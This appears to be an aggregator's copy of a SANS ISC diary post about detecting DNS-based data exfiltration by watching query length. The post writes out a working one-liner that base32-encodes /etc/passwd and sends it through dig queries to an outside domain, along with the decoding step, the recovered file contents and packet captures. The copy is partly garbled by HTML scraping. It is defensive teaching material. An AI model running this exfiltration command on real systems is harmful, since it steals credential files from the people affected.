One Article Review
| Source |  SANS Institute |
|---|---|
| Identifiant | 359221 |
| Date de publication | 2017-04-20 07:07:42 (vue: 2017-04-20 07:07:42) |
| Titre | DNS Query Length... Because Size Does Matter, (Thu, Apr 20th) |
| Texte | In many cases, DNS remains a goldmine to detect potentially malicious activity. DNS can be used in multiple ways to bypass securitycontrols. DNS tunnelling is a common way to establish connections with remote systems. It is often based on TXT records used to deliver the encoded payload. TXT records are also used for good reasons, like delivering SPF records but, too many TXT DNS request could mean that something weird is happening on your network. Instead of using TXT records, data exfiltration may occur directly via the FQDN (Fully Qualified Domain Name). The RFC 1035[1] states that a DNS query length is255 characters total with each subdomain being 63 characters or less. By using Base32 encoding[2], we can encode our data instrings compatible with the DNS requirements: A-Z, 0-9 and - padding:5px 10px"> $ cat /etc/passwd | base32 -w 63 | while read L do dig $L.data.rootshell.be @192.168.254.8 done Note: the parameter -w 63 padding:5px 10px"> $ grep data.rootshell.be queries.log 20-Apr-2017 08:32:11.075 queries: info: client 172.x.x.x#44635: query: OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.113 queries: info: client 172.x.x.X#50081: query: YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.173 queries: info: client 172.x.x.x#40457: query: QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.222 queries: info: client 172.x.x.x#56897: query: 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be IN A +E (192.168.254.8) 20-Apr-2017 08:32:11.276 queries: info: client 172.x.x.x#57339: query: GOTYHI2DUNRVGUZTIOTTPFXGGORPMJUW4ORPMJUW4L3TPFXGGCTHMFWWK4Z2PA5.data.rootshell.be IN A +E (192.168.254.8) ... To decode this on the attacker padding:5px 10px"> $ grep data.rootshell.be queries.log | cut -d -f8 | cut -d . -f1| base32 -d | more root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin ... We don padding:5px 10px"> # tcpdump -vvv -s 0 -i eth0 -l -n port 53 | egrep A\? .*\.data\.rootshell\.be tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes 172.x.x.x.40335 192.168.254.8.53: [udp sum ok] 9843+ [1au] A? OJXW65B2PA5DAORQHJZG633UHIXXE33POQ5C6YTJNYXWEYLTNAFGIYLFNVXW4OT.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.35770 192.168.254.8.53: [udp sum ok] 19877+ [1au] A? YHIYTUMJ2MRQWK3LPNY5C65LTOIXXGYTJNY5C65LTOIXXGYTJNYXW433MN5TWS3.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.41463 192.168.254.8.53: [udp sum ok] 29267+ [1au] A? QKMJUW4OTYHIZDUMR2MJUW4ORPMJUW4ORPOVZXEL3TMJUW4L3ON5WG6Z3JNYFHG.data.rootshell.be. ar: . OPT UDPsize=4096 (110) 172.x.x.x.38048 192.168.254.8.53: [udp sum ok] 30042+ [1au] A? 6LTHJ4DUMZ2GM5HG6LTHIXWIZLWHIXXK43SF5ZWE2LOF5XG63DPM5UW4CTTPFXG.data.rootshell.be. ar: . OPT UDPsize=4096 (110) ... As you can see, we just used standard DNS requests to exfiltrate data. To detect this, keep an eye on your DNS logs and particularlythe query length. The following graph width:770px" /> But, as usual, not all big DNS queries are suspicious. Some CDNs padding:5px 10px"> hxxps://2ecffd01e1ab3e9383f0-07db7b9624bbdf022e3b5395236d5cf8.ssl.cf4.rackcdn.com/Product/178ee827-0671-4f17-b75b-2022963f5980.pdf To reduce the risk of false positives, this control can be combined with others: The volume of traffic per IP The volume of traffic per (sub-)domain White-lists This technique is not new but comes back regularly |
| Envoyé | Oui |
| Condensat | /etc/passwd 0671 075 07db7b9624bbdf022e3b5395236d5cf8 08:32:11 1035 10px 110 113 168 172 173 192 19877+ 1au 2016 2017 2022963f5980 20th 222 254 262144 276 29267+ 30042+ 35770 38048 40335 41463 4f17 53: 6lthj4dumz2gm5hg6lthixwizlwhixxk43sf5zwe2lof5xg63dpm5uw4cttpfxg 9843+ @192 @xme activity all already also apr ar: are attacker attacks attribution b75b back base32 based because being big bin:x:2:2:bin:/bin:/usr/sbin/nologin but bypass bytes can capture cases cat cdns center cf4 characters client com/2016/05/unit42 com/product/178ee827 combined comes command common commons communications compatible connections consultant control could creative cut daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin data decode deliver delivering detect dig directly discovered dns does domain don done each edu egrep en10mb encode encoded encoding establish eth0 ethernet exfiltrate exfiltration eye f1| false following fqdn freelance front fully games:x:5:60:games:/usr/games:/usr/sbin/nologin goldmine good gotyhi2dunrvguztiottpfxggorpmjuw4orpmjuw4l3tpfxggcthmfwwk4z2pa5 graph grep handler happening http://researchcenter https://en https://isc https://www hxxps://2ecffd01e1ab3e9383f0 ietf info: instead instrings internet is255 isc just keep key length less license like link listening lists log logs lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin malicious malware man:x:6:12:man:/var/cache/man:/usr/sbin/nologin many matter may mean mechanism/ mertens more multiple name network new noncommercial not note: occur often ojxw65b2pa5daorqhjzg633uhixxe33poq5c6ytjnyxweyltnafgiylfnvxw4ot opt org/rfc/rfc1035 org/wiki/base32 others: padding:5px paloaltonetworks parameter particularlythe payload pdf per pgp port positives potentially qkmjuw4otyhizdumr2mjuw4orpmjuw4orpovzxel3tmjuw4l3on5wg6z3jnyfhg qualified queries queries: query query: rackcdn read reasons records reduce regularly remains remote request requests requirements: rfc risk root:x:0:0:root:/root:/bin/bash rootshell sans security securitycontrols see size some something spf ssl stage standard states storm sub subdomain sum suspicious sync:x:4:65534:sync:/bin:/bin/sync sys:x:3:3:sys:/dev:/usr/sbin/nologin systems tcpdump tcpdump: technique thu too total traffic tunnelling txt type udp udpsize=4096 united use used using usual volume vvv way ways weird wekby white width:770px wikipedia x#40457: x#44635: x#50081: x#56897: x#57339: xavier yhiytumj2mrqwk3lpny5c65ltoixxgytjny5c65ltoixxgytjnyxw433mn5tws3 your |
| Tags | |
| Stories | APT 18 |
| Notes | |
| Move | 
|
L'article ne semble pas avoir été repris aprés sa publication.
L'article ne semble pas avoir été repris sur un précédent.